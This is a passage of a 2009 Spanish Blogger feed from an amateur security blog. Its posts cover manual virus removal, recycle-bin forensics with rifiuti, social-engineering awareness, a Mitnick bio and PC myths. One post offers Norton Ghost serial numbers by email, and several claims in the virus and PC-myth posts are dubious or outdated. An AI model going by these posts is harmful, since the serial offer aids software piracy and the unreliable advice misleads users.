hay que poner un host de pago.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-6308807881519436086?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/6308807881519436086/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/10/envio-de-correo-falso.html#comment-form' title='2 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/6308807881519436086'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/6308807881519436086'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/10/envio-de-correo-falso.html' title='Envio de correo  falso'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-8224418370461407721</id><published>2009-10-09T23:39:00.000+02:00</published><updated>2009-10-09T23:40:57.095+02:00</updated><title type='text'>Guía rápida para eliminar virus</title><content type='html'>Tipos de virus: &lt;br /&gt;&lt;br /&gt;1. Partición. Afectan al sector 0 del disco duro, por tanto, para solucionarlo se debe entrar en modo MS-DOS y utilizar un parche para restaurar la partición. que puede tener nombres parecidos a este: RESTRMBR.EXE. Normalmente la solución es formateo de bajo nivel. &lt;br /&gt;2. Boot. Afectan al primer sector relativo de cada partición. La unica solución es formatear, no encontré parches. &lt;br /&gt;3. File. Por lo general, hay que formatear, y dende del daño al sistema. El daño se manifiesta cuando todos los archivos ejecutables (.com .sys .exe .dll) están modificados por el virus para ejecutar sus secuencias. Si el antivirus, no puede reparar los archivos en cuestión, la solución es formatear. &lt;br /&gt;4. Troyanos. Los troyanos son virus o programas instalados al iniciar el sistema. En la actualidad la mayor parte de los virus actúna como troyanos. Y su posible desinfección viene a continuación &lt;br /&gt;&lt;br /&gt;Eliminación manual de virus troyanos. &lt;br /&gt;&lt;br /&gt;1. Memoria. Eliminar el virus de la memoria RAM: &lt;br /&gt;1.1 Control Alt Del (Administrador de Tareas de Windows), Finalizar tarea en la tarea sospechosa de que sea virus. Esto solo se consigue con práctica, el hecho de identificar cual Tarea es válida y cual sospechosa. Ayuda mucho en esta tarea el Señor Google. También puedes enviar el archivo a http://www.kaspersky.com/sp/virusscanner para saber si es o no virus. &lt;br /&gt;1.2 MsConfig. Luego de haber Finalizado las Tareas sospechosas, es hora de arrancarlas del Inicio del sistema. Inicio, Ejecutar, MsConfig, Ficha Inicio, y aquí deshabilitamos las Tareas sospechosas. Otra vez, solo depende de la experiencia personal.En algunos casos, los virus se instalan como servicios. Para ello dentro de msconfig, entrar a servicios, que no muestre servicios comunes de Windows, y analizar cada servicio de donde proviene. &lt;br /&gt;2. Disco duro. Si estamos seguros que lo que hemos deshabilitado es virus troyano, entonces se procede a su eliminación del disco duro. Un troyano actúa como un arhivo, que carga otros, en una especie de árbol. Pero cuando se lo elimina del inicio, deja de hacer daños. Yo recomiendo usar Total Commander ( www.ghisler.com ) con las opciones de ver archivos ocultos y de sistema. &lt;br /&gt;2.1 Encontrar el archivo. Se pone buscar en búsqueda avanzada, pero Buscar Arhivos y carpetas ocultos, y también de sistema. Anotar exactamente el nombre Y la extensión! &lt;br /&gt;2.2 Eliminarlo. O moverlo, por si acaso se quiera restituirlo o examinarlo con un antivirus más potente. &lt;br /&gt;2.3 Crear Carpeta con ese nombe y extensión. Esto evita que el virus vuelva a implantarse. Cuando el virus quiera volver a instalarse, le dará un error interno, que no sabrá cómo interpretar, y abortará su instalación. Se supone que si ya existe esa carpeta, no puede haber un archivo con el mismo nombre que una carpeta ya existente. &lt;br /&gt;3. Registro. Los daños causados por un virus, pueden extenderse a la configuración del Registro de Windows. En esto no hay ayuda. Si el registro fue dañado, y dependiendo de la magnitud del cambio en la configuración, lo mejor es formatear. &lt;br /&gt;&lt;br /&gt;Notas: &lt;br /&gt;&lt;br /&gt;* Eliminar virus, no es eliminar los daños provocados por éste. Para parchar los daños, utilizar SpyBot Search&amp;Destroy.&lt;br /&gt;* Mejores antivirus: Kaspersky, McAfee Enterprise, Zone Alarm (solo por ser firewall al mismo tiempo) y Norton (Solo las últimas versiones).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;fuente: http://foros.abcdatos.com/viewtopic.php?f=28&amp;t=15887&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-8224418370461407721?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/8224418370461407721/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/10/guia-rapida-para-eliminar-virus.html#comment-form' title='2 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/8224418370461407721'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/8224418370461407721'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/10/guia-rapida-para-eliminar-virus.html' title='Guía rápida para eliminar virus'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-4266608581436697963</id><published>2009-10-09T16:14:00.000+02:00</published><updated>2009-10-09T16:17:41.240+02:00</updated><title type='text'>Análisis forense a la papelera de reciclaje.</title><content type='html'>Una técnica de análisis en sistemas muertos que se utiliza para saber que elementos contiene la papelera de reciclaje, cuando han sido eliminados y quien los elimino. En primer lugar necesitamos saber donde almacena Windows la papelera de reciclaje:&lt;br /&gt;&lt;br /&gt;* Windows NT/2000/XP/ en “C:\Recycler\”&lt;br /&gt;&lt;br /&gt;Un ejemplo en de la estructura en un Windows XP con dos usuarios:&lt;br /&gt;&lt;br /&gt;C:\RECYCLER\S-1-5-21-1417001333-343818398-1801674531-1004&lt;br /&gt;C:\RECYCLER\ S-1-5-21-1417001333-343818398-1801674531-500&lt;br /&gt;&lt;br /&gt;Dentro de estas carpetas de los dos usurarios de este sistema se encuentran los archivos borrados de cada uno. Además de estos archivos se encuentra también un archivo llamado INFO2 donde se almacena la información sobre cuando se borro y de donde se borro el archivo. Se puede extraer esta información con un editor hexadecimal, aunque es más fácil utilizar la herramienta rifiuti.&lt;br /&gt;&lt;br /&gt;Ejemplo:&lt;br /&gt;&lt;br /&gt;Entramos en la carpeta de usuario en la ruta “C:\RECYCLER”.&lt;br /&gt;&lt;br /&gt;C:\RECYCLER\S-1-5-21-1417001333-343818398-1801674531-500&gt;&lt;br /&gt;&lt;br /&gt;Y ejecutamos rifiuti:&lt;br /&gt;&lt;br /&gt;rifiuti INFO2&gt;e:\analisis.txt&lt;br /&gt;&lt;br /&gt;Y el resultado se genera en el archivo “analisis.txt” donde aparecerá: la fecha y hora de eliminación, la ruta de donde se eliminaron y el tamaño, de todos los archivos que se enviaron a la papelera de reciclaje.&lt;br /&gt;&lt;br /&gt;Rifiuti también esta disponible para Linux.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.foundstone.com/us/resources/proddesc/rifiuti.htm"&gt;descarga de &lt;br /&gt;rifiuti&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;fuente:foro.latinohack.com&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-4266608581436697963?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/4266608581436697963/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/10/analisis-forense-la-papelera-de.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/4266608581436697963'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/4266608581436697963'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/10/analisis-forense-la-papelera-de.html' title='Análisis forense a la papelera de reciclaje.'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-6211607508849340230</id><published>2009-10-08T10:47:00.000+02:00</published><updated>2009-10-08T10:50:52.694+02:00</updated><title type='text'>Ingenieria Social - Que es? Casos reales</title><content type='html'>En el campo de la inseguridad informática, ingeniería social es la práctica de obtener información confidencial a través de la manipulación de usuarios legítimos. Es una técnica que pueden usar ciertas personas, tales como investigadores privados, criminales, o delincuentes computacionales, para obtener información, acceso o privilegios en sistemas de información que les permitan realizar algún acto que perjudique o exponga la persona u organismo comprometido a riesgo o abusos.&lt;br /&gt;&lt;br /&gt;fuente: wikipedia.&lt;br /&gt;&lt;br /&gt;"Usted puede tener la mejor tecnología, firewalls, sistemas de detección de ataques, dispositivos biométricos, etc. Lo único que se necesita es un llamado a un empleado desprevenido e ingresan sin más. Tienen todo en sus manos." Kevin Mitnick.&lt;br /&gt;&lt;br /&gt;"La gente quiere ser agradable y no pretende armar un escándalo, pero es importante enseñarles a decir no. No debe haber sutilezas cuando lo que está en juego son nuestros ingresos." Allan Vance&lt;br /&gt;&lt;br /&gt;Bajo el nombre de Ingeniería Social (literalmente traducido del inglés Social Engineering) se encuentran comprendidas todas aquellas conductas útiles para conseguir información de las personas cercanas a una computadora. Es una disciplina que consiste, ni más ni menos en sacar información a otra persona sin que esta sé de cuenta de que te esta revelando "información sensible".&lt;br /&gt;&lt;br /&gt;Hoy en día sólo son necesarias las malas intenciones y una conexión a Internet para sembrar el caos. Ya no es cuestión de conocimientos, sobre todo teniendo en cuenta que en los sistemas operativos más populares, se antepone la comodidad a la seguridad del sistema mismo. La mayoría de los ataques a la seguridad se deben a errores humanos y no a fallas electrónicas. Los intrusos usan "ingeniería social" para acceder a los sitios, y siempre alguien los deja entrar sin ningún problema.&lt;br /&gt;&lt;br /&gt;    Quote relacionada [!]&lt;br /&gt;&lt;br /&gt;    "Roba al cielo y pon alli un sol falso" Retorno a los orígenes (Daoren) Proverbio Chino&lt;br /&gt;&lt;br /&gt;Tradicionalmente, los intrusos se han valido de los engaños para conseguir atacar al eslabón más débil de la cadena de usuarios y responsables de un equipo de cómputo o de una red. De nada vale encriptar las comunicaciones, sellar los accesos, diseñar un buen esquema de seguridad para las distintas estaciones de trabajo y jerarquizar convenientemente los accesos a los mismos si no contamos con un personal que se halle lo suficientemente preparado para hacerle frente los engaños externos.&lt;br /&gt;&lt;br /&gt;La principal herramienta que manejan actualmente los creadores de virus es la que se ha dado en llamar ingeniería social. Con este curioso término se engloba una serie de tretas, artimañas y engaños elaborados cuyo fin es confundir al usuario o, peor todavía, lograr que comprometa seriamente la seguridad de sus sistemas. Esto no es un conocimiento exacto pero, al ponerse en práctica con un grupo tan elevado de posibles víctimas, el éxito casi siempre está garantizado. Aprovechando sentimientos tan variados como la curiosidad, la avaricia, el sexo, la compasión o el miedo, el vándalo interesado consigue su objetivo, una acción por parte del usuario.&lt;br /&gt;&lt;br /&gt;Tradicionalmente, los intrusos se han valido de los engaños para conseguir atacar al eslabón más débil de la cadena de usuarios y responsables de un equipo de cómputo o de una red. De nada vale encriptar las comunicaciones, sellar los accesos, diseñar un buen esquema de seguridad para las distintas estaciones de trabajo y jerarquizar convenientemente los accesos a los mismos si no contamos con un personal que se halle lo suficientemente preparado para hacerle frente los engaños externos.&lt;br /&gt;&lt;br /&gt;La principal herramienta que manejan actualmente los creadores de virus es la que se ha dado en llamar ingeniería social. Con este curioso término se engloba una serie de tretas, artimañas y engaños elaborados cuyo fin es confundir al usuario o, peor todavía, lograr que comprometa seriamente la seguridad de sus sistemas. Esto no es un conocimiento exacto pero, al ponerse en práctica con un grupo tan elevado de posibles víctimas, el éxito casi siempre está garantizado. Aprovechando sentimientos tan variados como la curiosidad, la avaricia, el sexo, la compasión o el miedo, el vándalo interesado consigue su objetivo, una acción por parte del usuario.&lt;br /&gt;&lt;br /&gt;    Quote relacionada [!] "In fact, female social engineers have a distinct advafntage because they can use their sexuality to obtain cooperation". Kevin Mitnick, The Art Of Deception. [Chapter 4] &lt;br /&gt;&lt;br /&gt;Un claro ejemplo de Ingeniería Social más común es el de alguien que llama por teléfono a una empresa para decir que necesita ayuda o hablar con el administrador de la red porque hay que modificar algún aspecto de la configuración. Durante la conversación, y a través de escogidas y cuidadas preguntas, el atacante obtendrá los datos (como los códigos de acceso a los equipos) que necesita para vulnerar la seguridad de todo el corporativo.&lt;br /&gt;&lt;br /&gt;La ingeniería social es una acción muy simple, pero peligrosa. Los "hackers" llaman a los centros de datos y fingen ser un cliente que perdió su contraseña, o se dirigen a un sitio y esperan que alguien deje la puerta abierta. Otras formas de ingeniería social no son tan obvias. Los "hackers" son conocidos por crear sitios Web, concursos o cuestionarios falsos que piden a los usuarios que ingresen una contraseña. Si un usuario escribe la misma contraseña que usa en su trabajo, el hacker puede ingresar en las instalaciones sin tener que descifrar ni siquiera una línea de código.&lt;br /&gt;Quote relacionada [!]&lt;br /&gt;&lt;br /&gt;    "Many people look arround until they find a better deal; social engineers don´t look for a better deal, they find a way to make a deal better." Kevin Mitnick, The Art Of Deception. [Chapter 4]&lt;br /&gt;&lt;br /&gt;Con el objetivo de infectar el mayor número posible de equipos, cada vez son más los gusanos que recurren a la Ingeniería Social, habitualmente empleada por los creadores de código malicioso para engañar a los usuarios. En la Ingeniería Social no se emplea ningún programa de software o elemento de hardware, sólo grandes dosis de ingenio, sutileza y persuasión para así lograr obtener información a través de otra persona sin que se dé cuenta de que está revelando información importante con la que, además, el atacante puede dañar su computadora.&lt;br /&gt;&lt;br /&gt;En la práctica, los autores de virus (gusanos o troyanos) emplean la Ingeniería Social para que sus creaciones se propaguen rápidamente. Para ello atraen la atención del usuario y consiguen que realice alguna acción que, normalmente, consiste en inducirlo a que abra algún archivo que es el que procede a realizar la infección. De hecho, la mayoría de las pérdidas provocadas por los efectos de los códigos maliciosos tienen su origen en la ignorancia u omisión de políticas de seguridad.&lt;br /&gt;Quote relacionada [!]&lt;br /&gt;&lt;br /&gt;"Many people look arround until they find a better deal; social engineers don´t look for a better deal, they find a way to make a deal better." Kevin Mitnick, The Art Of Deception. [Chapter 4]&lt;br /&gt;&lt;br /&gt;El personal de una empresa debería de seguir las siguientes recomendaciones para evitar caer víctima de las trampas de la Ingeniería Social:&lt;br /&gt;&lt;br /&gt;1. - Antes de abrir los correos analizarlos con un antivirus eficaz y debidamente actualizado, ya que cualquier mensaje de correo electrónico puede contener códigos maliciosos aunque no le acompañe el símbolo de datos adjuntos.&lt;br /&gt;&lt;br /&gt;2. - Nunca ejecutar un programa de procedencia desconocida, aun cuando previamente sea verificado que no contiene virus. Dicho programa puede contener un troyano o un sniffer que reenvíe nuestra clave de acceso.&lt;br /&gt;&lt;br /&gt;3. - Los usuarios no necesitan tener acceso a todo tipo de ficheros ya que no todos son necesarios para su trabajo habitual, por ello puede ser conveniente por parte del administrador bloquear la entrada de ficheros con extensiones ".exe",".vbs", etc.&lt;br /&gt;&lt;br /&gt;4. - Nunca informe telefónicamente de las características técnicas de la red, sus localizaciones espaciales o personas a cargo de la misma. En su lugar lo propio es remitirlos directamente al responsable del sistema.&lt;br /&gt;&lt;br /&gt;5.- Controlar los accesos físicos al lugar donde se hallan los servidores o terminales desde los que se puede conectar con los servicios centralizados de control.&lt;br /&gt;&lt;br /&gt;6.- Nunca tirar documentación técnica a la basura, sino destruirla.&lt;br /&gt;&lt;br /&gt;7.- Verificar previamente la veracidad de la fuente que solicite cualquier información sobre la red, su localización en tiempo y espacio y las personas que se encuentran al frente de la misma.&lt;br /&gt;&lt;br /&gt;8.- En caso de existir, instalar los parches de actualización de software que publican las compañías para solucionar vulnerabilidades. De esta manera se puede hacer frente a los efectos que puede provocar la ejecución de archivos con códigos maliciosos.&lt;br /&gt;&lt;br /&gt;10.- Controlar que las anteriores instrucciones se cumplen sistemáticamente.&lt;br /&gt;fuente: http://www.lcu.com.ar/ingenieriasocial/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-6211607508849340230?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/6211607508849340230/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/10/ingenieria-social-que-es-casos-reales.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/6211607508849340230'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/6211607508849340230'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/10/ingenieria-social-que-es-casos-reales.html' title='Ingenieria Social - Que es? Casos reales'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-4189133322693580789</id><published>2009-10-04T18:20:00.000+02:00</published><updated>2009-10-04T18:22:57.458+02:00</updated><title type='text'>Como ser Hacker y como evitarlos</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_mFMUaCwtbag/SsjLnfa0_AI/AAAAAAAAABY/HyzlQFS_WLU/s1600-h/oa90dg.jpg.png"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 300px; height: 300px;" src="http://4.bp.blogspot.com/_mFMUaCwtbag/SsjLnfa0_AI/AAAAAAAAABY/HyzlQFS_WLU/s320/oa90dg.jpg.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5388780833458158594" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Quien es Kevin Mitnick?&lt;br /&gt;&lt;br /&gt;Kevin Mitnick (nacido el 6 de agosto de 1963) es uno de los hackers y Phreakers más famosos de los Estados Unidos. Su último arresto se produjo el 15 de febrero de 1995, tras ser acusado de entrar en algunos de los ordenadores más "seguros" de EE.UU.&lt;br /&gt;Ya había sido procesado judicialmente en 1981, 1983 y 1987 por diversos delitos electrónicos.El caso de Kevin Mitnick (su último encarcelamiento) alcanzó una gran popularidad entre los medios estadounidenses por la lentitud del proceso (hasta la celebración del juicio pasaron más de dos años), y las estrictas condiciones de encarcelamiento a las que estaba sometido (se le aisló del resto de los presos y se le prohibió realizar llamadas telefónicas durante un tiempo por su supuesta peligrosidad).&lt;br /&gt;Tras su puesta en libertad en 2002, Kevin Mitnick se dedica a la consultoría y el asesoramiento en materia de seguridad, a través de su compañía "Mitnick Security"(Anteriormente llamada: Defensive Thinking).&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.mediafire.com/?tj2dhzzljqz"&gt;descarga: &lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-4189133322693580789?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/4189133322693580789/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/10/como-ser-hacker-y-como-evitarlos.html#comment-form' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/4189133322693580789'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/4189133322693580789'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/10/como-ser-hacker-y-como-evitarlos.html' title='Como ser Hacker y como evitarlos'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_mFMUaCwtbag/SsjLnfa0_AI/AAAAAAAAABY/HyzlQFS_WLU/s72-c/oa90dg.jpg.png' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-6266367570024001358</id><published>2009-09-28T16:49:00.000+02:00</published><updated>2009-09-28T17:02:17.252+02:00</updated><title type='text'>Norton Ghost 14.0</title><content type='html'>Hola hoy ostraigo este sofware para copias de seguridad&lt;br /&gt;&lt;br /&gt;Norton Ghost es prácticamente la última innovación cuando se trata de hacer copia de respaldo de tus datos. Esta herramienta puede hacer respaldo de todo tipo de material en tu disco, incluyendo tu sistema operativo. Aún si tienes un fallo total en tu disco, puede restaurar tu sistema completo en un nuevo disco duro. Norton Ghost soporta copias incrementales de manera que no tengas la necesidad de hacer una copia de respaldo completa de tu sistema cada vez que lo necesites.&lt;br /&gt;&lt;br /&gt;Norton Ghost realiza copias de respaldo a discos externos conectados a tu puerto USB o Puerto de Firewire(IEEE 1394, o quema tus copias de respaldo a CDs o DVDs. Además te permite realizar copias a redes compartidas sobre cualquier servidor de archivos o Redes de Almacenamiento (NAS), e incluso servidores FTP. &lt;br /&gt;&lt;br /&gt;Para descagar desde cualquier pagina web y para los seriales mandarme un mensaje al correo y os digo los seriales.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-6266367570024001358?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/6266367570024001358/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/09/norton-ghost-140.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/6266367570024001358'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/6266367570024001358'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/09/norton-ghost-140.html' title='Norton Ghost 14.0'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-390839582893456664</id><published>2009-09-25T17:31:00.000+02:00</published><updated>2009-09-25T18:30:19.152+02:00</updated><title type='text'>20 cosas que Probablemente no sabias sobre tu PC</title><content type='html'>1. Es malo tener imágenes pegadas en el monitor.&lt;br /&gt;&lt;br /&gt;Verdadero. Sí, desgasta los colores. Si quierés acerca frente al monitor un desarmador que tenga imán en la punta y vas a ver como los imánes que tiene dentro hacen distorsión en los colores de la pantalla.&lt;br /&gt;&lt;br /&gt;2. Empujar el Cd para meterlo adentro de la compactera es malo.&lt;br /&gt;&lt;br /&gt;Falso. Abslutamente nada, está hecho para eso también.&lt;br /&gt;&lt;br /&gt;3. Si se te cae agua arriba del teclado, puede dañarse.&lt;br /&gt;&lt;br /&gt;Verdadero. Se queman las pistas de metal que están abajo de las letras.&lt;br /&gt;&lt;br /&gt;4. Es importante que haya espacio entre el monitor y la pared.&lt;br /&gt;&lt;br /&gt;Falso. No es necesario. Sólo necesita buena ventilación.&lt;br /&gt;&lt;br /&gt;5. Hay que reiniciar o apagar y prender la computadora cuando estuvo toda la noche prendida.&lt;br /&gt;&lt;br /&gt;Falso. Puede seguir funcionando perfectamente el disco rígido se conserva más si queda prendida y no es apagada una y otra vez. Fueron creadas para eso.&lt;br /&gt;&lt;br /&gt;6. Consume más energía cuando se prende, que en varias horas de uso.&lt;br /&gt;&lt;br /&gt;Falso. Al encender consume sólo un poco más que estando en funcionamiento.&lt;br /&gt;&lt;br /&gt;7.Le hace daño al CPU tener un celular cerca.&lt;br /&gt;&lt;br /&gt;Falso. No le hace daño, sólo provoca interferencia.&lt;br /&gt;&lt;br /&gt;8. Cuando apagas la computadora, dejala descansar unos segundos antes de prenderla denuevo.&lt;br /&gt;&lt;br /&gt;Verdadero. Se recomiendan 10 segundos.&lt;br /&gt;&lt;br /&gt;9. Si se mueve el CPU con la PC prendida puede quemarse del disco rígido.&lt;br /&gt;&lt;br /&gt;Falso. Es tanta la fuerza centrífuga con la que gira el disco rígido que no pasa nada si se mueve el CPU. Obvio que no hablamos de golpearla.&lt;br /&gt;&lt;br /&gt;10. Es bueno para el monitor dejar un protector de pantalla cuando el mismo no se encuentra en uso.&lt;br /&gt;&lt;br /&gt;Verdadero. El protector de pantalla hace que el desgaste de los colores sea uniforme.&lt;br /&gt;&lt;br /&gt;11. Cuando hay tormenta mejor desenchufa la PC&lt;br /&gt;&lt;br /&gt;Verdadero. Es casi una obligación cuando hay una tormenta eléctrica. Una cantidad impresionante de modems se rompen por descarga de rayos.&lt;br /&gt;&lt;br /&gt;12. No es bueno mirar la luz roja de los mouses opticos.&lt;br /&gt;&lt;br /&gt;Verdadero. No va a dejar ciego a nadie, pero es una luz fuerte que causa daño.&lt;br /&gt;&lt;br /&gt;13. En las notebooks hay que enchufar primero el cable de corriente a la computadora y después ese cable a tierra.&lt;br /&gt;&lt;br /&gt;Falso. Puede hacerse como se quiera.&lt;br /&gt;&lt;br /&gt;14. Cuando se apaga la PC es conveniente apagar también el monitor.&lt;br /&gt;&lt;br /&gt;Falso. Al apagar el CPU queda en un estado en el que consume muy poca energía y no se desgasta.&lt;br /&gt;&lt;br /&gt;15. No poner CDs o Diskettes sobre el CPU, es malo.&lt;br /&gt;&lt;br /&gt;Falso. Nada de lo que se ponga sobre ella la afecta, a menos que esté mojado y el agua pueda entrar al CPU.&lt;br /&gt;&lt;br /&gt;16. Nunca poner la PC al sol.&lt;br /&gt;&lt;br /&gt;Verdadero. Se recalienta más de lo que lo normal, disminuyendo su vida útil.&lt;br /&gt;&lt;br /&gt;17. El disco rígido con el 80% de su capacidad usada, hace más lenta la PC.&lt;br /&gt;&lt;br /&gt;Verdadero. El funcionamiento de la computadora será lento.&lt;br /&gt;&lt;br /&gt;18. No quitar el USB sin avisarle a la maquina.&lt;br /&gt;&lt;br /&gt;Verdadero. Hay que seleccionar la opción para “retirarlo con seguridad” antes de desenchufarlo por que se corre el riesgo de quemar la memoria del USB.&lt;br /&gt;&lt;br /&gt;19. El escritorio lleno de iconos, hace más lenta la máquina.&lt;br /&gt;&lt;br /&gt;Verdadero. Los que importan son los íconos de programas o archivos, por que la tarjeta de video de la computadora renueva constantemente la información que se presenta en la pantalla y cuando hay más íconos, tarda más.&lt;br /&gt;&lt;br /&gt;20. Apagar la máquina mediante el famoso botonazo puede dañar tu computadora.&lt;br /&gt;&lt;br /&gt;Verdadero. Si se le saca corriente al disco rigido mientras está leyendo o escribiendo en alguna parte del sistema, se puede quemar. Cuando se apaga repentinamente, las placas que cubren al disco (que gira hasta 10 mil revoluciones) aterrizan sobre él y pueden ir “picando” hasta la posición de descanso, dejándole marcas importantes.&lt;br /&gt;&lt;br /&gt;fuente: http://www.edumanmx.com/2008/10/20-cosas-que-probablemente-no-sabias.html&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-390839582893456664?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/390839582893456664/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/09/20-cosas-que-probablemente-no-sabias.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/390839582893456664'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/390839582893456664'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/09/20-cosas-que-probablemente-no-sabias.html' title='20 